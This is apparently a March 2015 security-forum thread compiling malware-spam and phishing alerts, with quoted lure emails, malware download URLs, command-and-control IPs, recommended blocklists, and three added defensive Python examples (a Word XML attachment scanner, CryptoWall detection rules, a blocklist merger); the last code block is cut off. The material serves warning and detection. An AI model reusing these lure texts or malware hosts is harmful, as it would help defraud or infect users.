Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Confirmation-of-Booking.png
18 March 2015 : NWN Confirmation Letter.doc - Current Virus total detections: 3/57* | 3/57**
One version of this malicious macro tries to download deosiibude .de/js/bin.exe (... this is currently offline and most probably removed by its host). Other download sites are www .asociacecasin .com/js/bin.exe and pmmarkt .de/js/bin.exe both downloading same malware which is saved as %temp%\frexobj86.exe ( Virus Total***). So far I am only seeing 2 versions of this malware, but previous campaigns over the last few weeks have delivered 3, 4 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/75fd55da996bf800d3e6f517e1045bdf3f434768328bad344910a79fa81abead/analysis/1426671991/
** https://www.virustotal.com/en/file/4e07444af5611b7f895fa1511e7ab4109d5f0041fda494a431d8f3950b4c0c59/analysis/1426671176/
*** https://www.virustotal.com/en/file/e50011c9c5bc5abdf9bbbe402b2b8d0ffce1b1e2254f1fdea1e7d77f0a5a1385/analysis/1426674582/
- http://blog.dynamoo.com/2015/03/malware-spam-confirmation-of-booking.html
18 Mar 2015
"... Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24 "
___
Fake 'unpaid invoice' SPAM - doc / xls malware
- http://myonlinesecurity.co.uk/unpaid-invoice-notification-word-doc-or-excel-xls-spreadsheet-malware/
18 Mar 2015 - "'February unpaid invoice notification' pretending to come from numerous email addresses and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Alternative subjects seen today so far are:
February unpaid invoice notification
January unpaid invoice notification
December unpaid invoice notification
This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a totally-blank-body with a randomly named word XML doc attachment...
18 March 2015 : 43GEB594.doc - Current Virus total detections: 0/57* | 0/57** |0/57***
So far I am seeing multiple versions of this malware... some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/37e4abc58302e61c83573b83fe25a3729d35e9d6d61906624ff5f7543a3270bb/analysis/1426679613/
** https://www.virustotal.com/en/file/21a4682565fa2390f904cfa564beca82558fdef173ca776b73994751104e7948/analysis/1426679518/
*** https://www.virustotal.com/en/file/f15178cdb159fb04d8ab3fdaf7ca49943603912c0dde9b7b7f03680246b1f05b/analysis/1426679965/
- http://blog.dynamoo.com/2015/03/malware-spam-december-unpaid-invoice.html
18 Mar 2015
"... Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244"
___
Fake 'Gateway gov' SPAM - zip/doc/rtf malware
- http://blog.dynamoo.com/2015/03/malware-spam-your-online-gatewaygovuk.html
18 Mar 2015 - "This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.
From: Gateway .gov .uk
Date: 18 March 2015 at 13:19
Subject: Your online Gateway .gov .uk Submission
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit ...
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov .uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57*. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:
canabrake .com .mx/css/doc11.rtf
straphael .org .uk/youth2000_files/doc11.rtf
My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend -blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan."
* https://www.virustotal.com/en/file/1b3e0b87bbb4d84c7e7b4bea5a409df7272adef9487bbe239ebbfd2be0fa60bf/analysis/1426693801/
___
Fake JP Morgan SPAM - malicious attachment
- http://myonlinesecurity.co.uk/carrie-l-tolstedt-jp-morgan-access-fw-customer-account-docs-fake-pdf-malware/
18 Mar 2015 - "'Carrie L. Tolstedt FW: Customer account docs' pretending to come from JP Morgan Access <Carrie.Tolstedt@ jpmorgan .com> with link to a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Customer-account-docs-J-P-Morgan.png
The link in the email goes once again to a cubby user content site...
17 March 2015: SignedDocuments.zip: Extracts to: SignedDocuments.scr
Current Virus total detections: 3/56* which is the same malware, although renamed, as today’s Australia Post Track Advice Notification: Consignment RYR3602120 – fake PDF malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...
* https://www.virustotal.com/en/file/157158f46dc0a72c703f48d337b6f1ccd128e3f3c85ff955c435cf12f296f5a8/analysis/1426610474/
** http://myonlinesecurity.co.uk/australia-post-track-advice-notification-consignment-ryr3602120fake-pdf-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-jp-morgan-access.html
18 Mar 2015 - "... Carrie L Tolstedt is a real executive... at Wells Fargo*. The lady in the picture is another Wells Fargo employee entirely**...."
* https://www.wellsfargo.com/about/corporate/executive_officers/tolstedt
** http://www.americanbanker.com/authors/jamie-moldafsky-1609.html?csite=fsm
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
:fear::fear: :mad:
AplusWebMaster
2015-03-19, 13:19
FYI...
Fake Fax SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/fax-from-4921154767199-pages-1-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "'Fax from +4921154767199 Pages: 1' pretending to come from faxtastic! <fax@ faxtastic .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
You have received a new fax. To view it, please open the attachment.
Did you know we now send? Visit www .faxtastic .co.uk for more details.
Regards,
faxtastic Support Team
19 March 2015 : 2015031714240625332.xls - Current Virus total detections: 2/57* | 2/57** at least one of these malicious macros is contacting meostore .net/js/bin.exe to download the dridex banking Trojan. (VirusTotal***). There will be other download locations... So far I am only seeing 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c5b83418c7fbe3e3799decce6162525b1ca73eeb8854e5e599c4830bb54de9a4/analysis/1426754021/
** https://www.virustotal.com/en/file/98b1ae63a582fbb998959648c7fdee5be9ce7a4341c4bb474fe7b64997197784/analysis/1426753958/
*** https://www.virustotal.com/en/file/0eecb2e26fe9adbd66d4c498a0e752453872d2bf4ee25654048dc7a89f708b89/analysis/1426753820/
... Behavioural information
TCP connections
95.163.121.200: https://www.virustotal.com/en/ip-address/95.163.121.200/information/
___
Fake 'Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/marflow-your-sales-order-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "'Marflow Your Sales Order' pretending to come from sales@ marflow .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Your order acknowledgment is attached.
Please check carefully and advise us of any issues.
Best regards
Marflow
19 March 2015 : 611866.xls - Current Virus total detections: 2/57* | 2/57**
Although these are -different- macros to the earlier XLS spam macro run today, they appear to be contacting the -same- sites and downloading the same dridex malware Fax from +4921154767199 Pages: 1 – word doc or excel xls spreadsheet malware:
> http://myonlinesecurity.co.uk/fax-from-4921154767199-pages-1-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ac3885b9c56fd0c55dbfc92423a32952cafc6aaf1117d4eb018c963c124696e2/analysis/1426760344/
** https://www.virustotal.com/en/file/89ca72fa4dcddefbad0d90abbbd55c29e91ddc149ff6a057ca9f280e5cf46733/analysis/1426760388/
- http://blog.dynamoo.com/2015/03/malware-spam-salesmarflowcouk-your.html
19 March 2015
"... Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201"
___
Fake Solicitors Debt SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
19 Mar 2015 - "This spam has a malicious attachment.
Date: 19 March 2015 at 12:52
Subject: Aspiring Solicitors Debt Collection
Aspiring Solicitors
Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.
You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.
Court Fees GBP 245.00
Solicitors Costs GBP 750.00
Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings...
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indications are that this can run even with macros disabled. Each attachment has a unique MD5..."
- http://myonlinesecurity.co.uk/aspiring-solicitors-debt-collection-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Aspiring-Solicitors-Debt-Collection.png
> https://www.virustotal.com/en/file/01bbd36cb0d0807a7ae036e9cd51c08aba5db48b66edf6d18791b69d1377a326/analysis/1426773553/
0 / 57
___
More Fake Invoice SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-id77f5451-in-attachment-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "A whole series of emails with multiple subjects all having random numbers including:
Invoice ID:77f5451 in attachment
Your February Invoice ID:58a0834
These all come from multiple random addresses with a malicious word doc or Excel XLS spreadsheet attachment and are another one from the current bot runs... The emails all have a completely-empty body.
19 March 2015 : 58a0834.doc - Current Virus total detections: 0/57*
These look very similar to Aspiring Solicitors Debt Collection – word doc or excel xls spreadsheet malware:
> http://myonlinesecurity.co.uk/aspiring-solicitors-debt-collection-word-doc-or-excel-xls-spreadsheet-malware/
The same warning must apply and opening the malicious doc will infect you, even with macros disabled... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0e644b56427fb7462325b27b2367a4efe5f5734b3929c5d8ecfe20c0be21bf7e/analysis/1426778947/
0 / 57
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-id987654321-in.html
19 Mar 2015 - "... contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the -same- as the one used in this attack*..."
* http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
___
BoA Phish seeks personal data ...
- https://blog.malwarebytes.org/fraud-scam/2015/03/bank-of-america-phish-seeks-personal-data-bonanza/
Mar 19, 2015 - "If you’re a Bank of America customer you’ll want to avoid this phishing URL, located at 74.208.43.206 /html/E-Alert(Dot)html:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/boaph1.jpg
The site says:
"We need you to verify your account information for your online banking to be re-activated"
...and asks visitors to “click-the-download-button to receive your verification file”, then open it in their browser. As it turns out, “downloading the file” means “visit another webpage”:
Alertfb .pw /site/IrregularActivityFile(dot)html
The above site takes those eager to hand over personal information to the cleaners – there’s a wide variety of data harvested including Online ID and passcode, name, DOB, social security number, drivers license number, email address and password. That’s not all – there’s also 3 security questions and payment information / address to complete the carefully laid out steps... That’s a lot of info to hand over to scammers, and anybody who thinks they may have been caught by something similar to the above should contact their bank immediately. Some of the images on the website are apparently broken and none of the URLs look remotely like legitimate BoA URLs so that will hopefully deter a few would be banking disasters. While in the process of drafting this blog we’ve noticed the second site which asks for the bulk of the banking customer information is being -flagged- by Chrome for phishing, so hopefully that will help to reduce the potential victim pool still further. We’ll update the post as we test with different browsers, but for now watch what you click and be very cautious should you see either of the two URLs pop up in an unsolicited email…"
74.208.43.206: https://www.virustotal.com/en/ip-address/74.208.43.206/information/
104.219.184.113: https://www.virustotal.com/en/ip-address/104.219.184.113/information/
:fear: :mad:
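The 'Aspiring Solicitors' and 'Invoice ID' attachments above are described as Word 2003 XML files carrying an embedded OLE object that leads to a VBA macro, which is why they can fire even with macros disabled. Below is an added example of how a mail gateway or analyst script can triage such a file offline: it decodes every base64 <w:binData> blob in a WordprocessingML document and reports what the decoded bytes actually are. This is my own illustration, not code from dynamoo.com or myonlinesecurity.co.uk, and the two documents it scans are constructed stand-ins (the OLE blob is just the compound-file signature plus padding, not a real embedded object).

```python
"""Triage a Word 2003 XML (.doc that is really WordprocessingML) for embedded binaries.

Added example for this thread, not the blog authors' tooling. The sample
documents are constructed; real oledata.mso blobs are ActiveMime-wrapped,
which the MAGIC table below also recognises.
"""
import base64
import xml.etree.ElementTree as ET

W_NS = "http://schemas.microsoft.com/office/word/2003/wordml"

# Leading bytes of the container types that matter for this triage.
MAGIC = {
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE compound file",   # can hold VBA / embedded objects
    b"ActiveMime": "ActiveMime container",                     # oledata.mso wrapper
    b"MZ": "Windows PE executable",
    b"PK\x03\x04": "ZIP container",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"\xff\xd8\xff": "JPEG image",
}
# Anything in this set inside an "invoice" or "letter" warrants quarantine.
SUSPICIOUS = {"OLE compound file", "ActiveMime container",
              "Windows PE executable", "ZIP container"}


def classify(blob: bytes) -> str:
    """Label a decoded blob by its leading bytes."""
    for magic, label in MAGIC.items():
        if blob.startswith(magic):
            return label
    return "unknown"


def scan_wordml(xml_text: str) -> list:
    """Return [(binData name, decoded length, classification), ...]."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter(f"{{{W_NS}}}binData"):
        name = el.get(f"{{{W_NS}}}name", "?")
        try:
            # Word wraps the base64 across lines; strip all whitespace first.
            blob = base64.b64decode("".join((el.text or "").split()), validate=True)
        except ValueError:
            findings.append((name, 0, "undecodable base64"))
            continue
        findings.append((name, len(blob), classify(blob)))
    return findings


def is_suspicious(findings: list) -> bool:
    return any(label in SUSPICIOUS or label == "undecodable base64"
               for _, _, label in findings)


# Constructed samples (NOT the real attachments): one with an OLE blob, one with a PNG.
OLE_BLOB_B64 = base64.b64encode(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64).decode()
PNG_BLOB_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()

MALICIOUS_DOC = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:wordDocument xmlns:w="{W_NS}">
  <w:binData w:name="oledata.mso">{OLE_BLOB_B64}</w:binData>
  <w:body><w:p><w:r><w:t>Invoice ID:77f5451 in attachment</w:t></w:r></w:p></w:body>
</w:wordDocument>"""

BENIGN_DOC = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:wordDocument xmlns:w="{W_NS}">
  <w:binData w:name="wordml://image1.png">{PNG_BLOB_B64}</w:binData>
  <w:body><w:p><w:r><w:t>Quarterly newsletter</w:t></w:r></w:p></w:body>
</w:wordDocument>"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_DOC), ("benign", BENIGN_DOC)):
        f = scan_wordml(doc)
        print(label, f, "-> suspicious" if is_suspicious(f) else "-> clean")
```

The check is deliberately about what the blob is, not what the file is called: the thread shows these lures arriving as .doc, while the bytes inside say OLE or PE. Pairing this with a rule that quarantines any "document" whose binData contains a compound file or executable catches the macros-disabled variant that a plain VBA scanner misses.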
AplusWebMaster
2015-03-20, 12:41
FYI...
CryptoWall 3.0 Ransomware partners with FAREIT spyware
- http://blog.trendmicro.com/trendlabs-security-intelligence/cryptowall-3-0-ransomware-partners-with-fareit-spyware/
Mar 19, 2015 - "... CryptoWall 3.0 arrives via spammed emails, using a JavaScript attachment. In the screenshot below*, the attachment poses as a resume inside an archive file. A .JS file (detected as JS_DLOADR.JBNZ, JS_DLOAD.CRYP, and JS_DLOADE.XXPU) will be extracted from the file, which is peculiar, as the file extensions often associated with resumes are .DOC, .PDF and .RTF.
* http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-11.jpg
... it will connect to two URLs to download “.JPG” files. But don’t be fooled by the extension — this is an old technique which may bypass poorly designed intrusion detection systems (IDS) by disguising malware as an image file... The JS file will execute the files after a successful download... TROJ_CRYPWAL.YOI will create a new instance of explorer.exe to gain local admin privilege, provided that the victim has admin rights — which is a common setup. Using a legitimate system process like explorer.exe could help the malware bypass scanners that use whitelisting. It will create a new instance of svchost.exe with -k netsvcs arguments which will perform the C&C communication and file encryption. This also gives the malware system service privileges... After receiving the RSA public key for file encryption from its C&C server, as the private key to be used for decryption is stored in the server, it will start encrypting the files with certain file extensions. Targeted files include documents, databases, emails, images, audio, video, and source codes. After encrypting a file using RSA-2048 encryption algorithm, it will append a random file extension to the original file name, and add the “HELP_DECRYPT” files to the directory affected. After its encryption routine, it will open the “HELP_DECRYPT” files to show the victim the dreaded ransom note:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-5.jpg
TSPY_FAREIT.YOI is executed alongside TROJ_CRYPWAL.YOI. While the victim is distracted by CryptoWall’s -extortion- the spyware will steal credentials stored in the system’s FTP clients, web browsers, email clients and even Bitcoin wallets... this is the first time we’ve seen crypto-ransomware team up with spyware. This just shows that the cybercriminals are getting greedier. They are no longer content with the revenue they get from their ransom, around US$500 — which -doubles- after a certain period of time has lapsed:
Ransom fee increases:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-6.jpg
... the threat actors are using an “old business model” as their back-up plan. Even if the victim refuses to pay the Bitcoin ransom, the cybercriminals can still get money by stealing existing Bitcoin wallets and by selling/using any stolen information. Based on feedback from the Smart Protection Network, the region most affected by CryptoWall 3.0 is Australia/New Zealand, followed by North America and Europe:
Regions affected by CryptoWall 3.0:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-7.jpg
Users can protect their important data by regularly backing up their files. They can implement the 3-2-1 rule** for their files. Of course, for threats like crypto-ransomware and spyware, other safety practices are advised... users should -never- open attachments from unknown or unverified senders... ignore or -delete- from unknown senders..."
** http://blog.trendmicro.com/trendlabs-security-intelligence/world-backup-day-the-3-2-1-rule/
"... The accepted rule for backup best practices is the three-two-one rule. It can be summarized as: if you’re backing something up, you should have:
• At least three copies,
• In two different formats,
• with one of those copies off-site..."
:fear::fear: :mad:
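The Trend Micro write-up above gives three host-level behaviours worth alerting on: a fresh explorer.exe started by the dropper, an svchost.exe -k netsvcs instance whose parent is that explorer.exe rather than services.exe, and one process renaming many files to a random extension while writing HELP_DECRYPT files into each directory. The following is an added example (mine, not Trend Micro's) of those three rules expressed over endpoint telemetry. The event records are a constructed, simplified Sysmon-like shape (type, pid, image, parent_image, cmdline, path) rather than real logs, and the assumption that a legitimate explorer.exe is parented by userinit.exe or explorer.exe is mine.

```python
"""Behavioural rules for the CryptoWall 3.0 chain described in the thread.

Added example, not Trend Micro code. Events are constructed dicts in a
simplified Sysmon-like form so the rules can be exercised offline.
"""
from collections import defaultdict

# Assumption: on a healthy Windows host these are the only parents of explorer.exe.
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "explorer.exe"}
# Rename targets that legitimate tools commonly produce in bulk.
BENIGN_NEW_EXTS = {"bak", "tmp", "old"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_svchost_parent(ev: dict):
    """svchost.exe should be started by services.exe; CryptoWall launches its own
    'svchost.exe -k netsvcs' from the explorer.exe instance it created."""
    if (ev["type"] == "process_create" and basename(ev["image"]) == "svchost.exe"
            and basename(ev["parent_image"]) != "services.exe"):
        return (f"pid {ev['pid']}: svchost.exe spawned by "
                f"{basename(ev['parent_image'])} ({ev['cmdline']})")
    return None


def rule_explorer_parent(ev: dict):
    """A second explorer.exe started by an arbitrary binary (here the dropper)."""
    if (ev["type"] == "process_create" and basename(ev["image"]) == "explorer.exe"
            and basename(ev["parent_image"]) not in EXPECTED_EXPLORER_PARENTS):
        return f"pid {ev['pid']}: explorer.exe spawned by {ev['parent_image']}"
    return None


def rule_ransom_note(ev: dict):
    """The HELP_DECRYPT.* files dropped into every encrypted directory."""
    if ev["type"] == "file_create" and basename(ev["path"]).startswith("help_decrypt"):
        return f"pid {ev['pid']}: ransom note written to {ev['path']}"
    return None


def rule_mass_extension_change(events: list, threshold: int = 5) -> list:
    """One process giving many files a new, unfamiliar extension is the encryption loop."""
    per_pid = defaultdict(int)
    for ev in events:
        if ev["type"] != "file_rename":
            continue
        old_ext = ev["path"].rsplit(".", 1)[-1].lower()
        new_ext = ev["new_path"].rsplit(".", 1)[-1].lower()
        if old_ext != new_ext and new_ext not in BENIGN_NEW_EXTS:
            per_pid[ev["pid"]] += 1
    return [f"pid {pid}: {n} files given a new extension"
            for pid, n in per_pid.items() if n >= threshold]


def detect(events: list) -> list:
    """Run every rule and return the list of alert strings."""
    alerts = []
    for ev in events:
        for rule in (rule_svchost_parent, rule_explorer_parent, rule_ransom_note):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    alerts.extend(rule_mass_extension_change(events))
    return alerts


# Constructed telemetry (not real logs): a normal svchost, then the chain from the write-up.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 720, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process_create", "pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\ab12.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 4188, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "svchost.exe -k netsvcs"},
] + [
    {"type": "file_rename", "pid": 4188, "path": rf"C:\Users\victim\Documents\report{i}.docx",
     "new_path": rf"C:\Users\victim\Documents\report{i}.docx.q3x7a"} for i in range(6)
] + [
    {"type": "file_create", "pid": 4188, "path": r"C:\Users\victim\Documents\HELP_DECRYPT.TXT"},
    {"type": "file_rename", "pid": 900, "path": r"C:\Users\victim\notes.txt",
     "new_path": r"C:\Users\victim\notes.bak"},   # benign rename, must not count
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The parent-process checks are the cheap part and fire before any file is touched; the rename counter is what makes the difference once encryption has begun, and in a real deployment it would be evaluated per process over a sliding time window rather than over a whole batch.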
AplusWebMaster
2015-03-20, 13:53
FYI...
Something evil on 85.143.216.102 and 94.242.205.101
- http://blog.dynamoo.com/2015/03/something-evil-on-85143216102-and.html
20 Mar 2015 - "... I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report*] being reached via 85.143.216.102 (AirISP, Russia) [VT report**]. Whatever it is, it is using subdomains from -hijacked- GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs... For practical purposes though I recommend you block traffic to the IPs rather than the domains.
Recommended blocklist:
85.143.216.102
94.242.205.101"
* https://www.virustotal.com/en/ip-address/94.242.205.101/information/
** https://www.virustotal.com/en/ip-address/85.143.216.102/information/
[1] http://pastebin.com/MWhk2qy8
[2] http://pastebin.com/XdBKFtP8
___
Nuclear EK leverages Flash CVE-2015-0336
- https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/
Mar 19, 2015 - "... Malwarebytes Anti-Exploit* users are already protected against this threat... Adobe has confirmed that a variant of CVE-2015-0336 is being exploited 'in-the-wild'. CVE-2015-0336 was -resolved- in Flash Player 17.0.0.134 (see APSB15-05**)..."
* http://www.malwarebytes.org/antiexploit/
** https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0336 - 9.3 (HIGH)
___
How Victims Are Redirected to IT Support Scareware Sites
- https://isc.sans.edu/diary.html?storyid=19487
2015-03-20 - "In the classic version of tech support scams, the fake technician initiated an unsolicited phone call to the victim. Now that awareness of this scheme has increased, scammers have shifted tactics. Their latest approaches involve convincing the potential victim to be the one calling the impostor. I've seen this accomplished in two ways:
• Scammers use bots to respond to Twitter users who mention PC problems or malware. The bots search for the appropriate keywords and send messages that include a phone number of a tech support firm. I described this approach when exploring how scammers prescreen potential victims.
• Scammers set up scareware websites that are designed to fool people into thinking their PC is infected, compelling visitors to call the fake tech support organization... Let’s take a look at a domain redirection variation of this scam below.
In the following example, the victim visited a link that was once associated with a legitimate website: 25yearsofprogramming .com. The owner of the domain appears to have allowed its registration to expire in early 2014. At that point, the domain was transferred to Name Management Group, according to DomainTools Whois records... Name Management Group seems to own over 13,000 domains (according to DomainTools Whois records), including numerous domains that DomainTools classifies as -malicious- ... (Don't visit these domains.)
- Landing on the Fake Malware Warning Site:
Visiting the once-legitimate URL a few days ago landed the victim on a scammy scareware page, designed to persuade the person to contact "Microsoft Certified Live Technicians" at the specified toll-free phone number. The site employed social engineering techniques employed by rogue antivirus tools. Such schemes present victims with fake virus warnings, designed to scare people into submission. The site in our example also played an auditory message, exclaiming:
"This is a Windows system warning! This is a Windows system warning! If you are hearing this warning message, the security of your Windows system has been compromised. Your Windows computer and data might be at risk because of adwares, spywares and malicious pop-ups! Your bank details, credit card information, email accounts, Facebook account, private photos and other sensitive files may be compromised. Please call the number mentioned now to resolve this issue."
To see and hear what the victim experienced... watch it on YouTube:
- https://www.youtube.com/watch?v=Pe2HLvOGEaA
... The companies behind these servers, as well as the firm presently controlling 25yearsofprogramming .com, are probably receiving referral fees for their role in the redirection scheme. There's much to explore regarding the domain names, systems and companies involved in the schemes outlined above... If you decide to explore any of these systems, do so from an isolated laboratory environment. Also, if you encounter a tech support scam, please register it with our database of such incidents:
- https://isc.sans.edu/reportfakecall.html "
(More detail at the isc diary URL at the top of this post.)
___
Who Develops Code for IT Support Scareware Websites?
- https://isc.sans.edu/diary.html?storyid=19489
2015-03-20
- https://isc.sans.edu/diaryimages/images/yourtechsupport-l3-large.png
___
The Manipulative Nature and Mechanics of Visitor Survey Scams
- https://zeltser.com/visitor-survey-scams/
March 18, 2015
- Lenny Zeltser
___
Fake pictures SPAM - malware
- https://www.virustotal.com/en/file/bd43c4d11401a46c9e46226eb6115378ee7ba8a9ea99e07c14da5f7f56af2527/analysis/1426864158/
20 Mar 2015 - "'American Wholesale Pictures' pretending to come from Tod <tod@ awrco .com> with a zip attachment is another one from the current bot runs... The email looks like:
Hi,
Sorry for the delay I just received these this morning.
Here are the pictures of the panels that you requested.
Thank you,
Adam
Office
Manager
American Wholesale Co.
Phone: 216-426-8882
Fax: 216-426-8883 ...
20 March 2015: 084-16475-4999.zip: Extracts to: img.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bd43c4d11401a46c9e46226eb6115378ee7ba8a9ea99e07c14da5f7f56af2527/analysis/1426864158/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
:fear: :mad:
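Several posts above quote dynamoo.com "Recommended blocklist" entries (the Confirmation of booking, unpaid invoice, Marflow and 85.143.216.102/94.242.205.101 items), and the same /24 turns up more than once. Here is an added example, my own and not dynamoo's tooling, of merging those lists into one de-duplicated set of networks, checking an address against it and emitting firewall rules. The entries are copied from the posts above; the addresses used in the lookups are constructed test values apart from 95.163.121.200, which the fax-malware item above lists as a TCP contact and which falls inside the quoted /24.

```python
"""Consolidate the blocklists quoted in this thread into one network set.

Added example, not dynamoo's code. RAW_BLOCKLIST is copied from the
"Recommended blocklist" lines in the posts above.
"""
import ipaddress

RAW_BLOCKLIST = """
# Confirmation of booking (18 Mar 2015)
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24
# December/February unpaid invoice (18 Mar 2015)
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244
# sales@marflow.co.uk Your Sales Order (19 Mar 2015)
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201
# Something evil on 85.143.216.102 and 94.242.205.101 (20 Mar 2015)
85.143.216.102
94.242.205.101
"""


def parse_blocklist(text: str) -> list:
    """Parse one IP or CIDR per line (comments allowed), merging duplicates and
    any host address already covered by a listed network."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        # strict=False tolerates host bits set in a CIDR, e.g. 10.0.0.1/24.
        nets.append(ipaddress.ip_network(line, strict=False))
    return list(ipaddress.collapse_addresses(nets))


def is_blocked(address: str, nets: list) -> bool:
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in nets)


def to_iptables(nets: list, chain: str = "OUTPUT") -> list:
    """Render the merged set as egress DROP rules (one line per network)."""
    return [f"iptables -A {chain} -d {net.with_prefixlen} -j DROP" for net in nets]


if __name__ == "__main__":
    merged = parse_blocklist(RAW_BLOCKLIST)
    print(f"{len(merged)} networks after merge")
    for rule in to_iptables(merged):
        print(rule)
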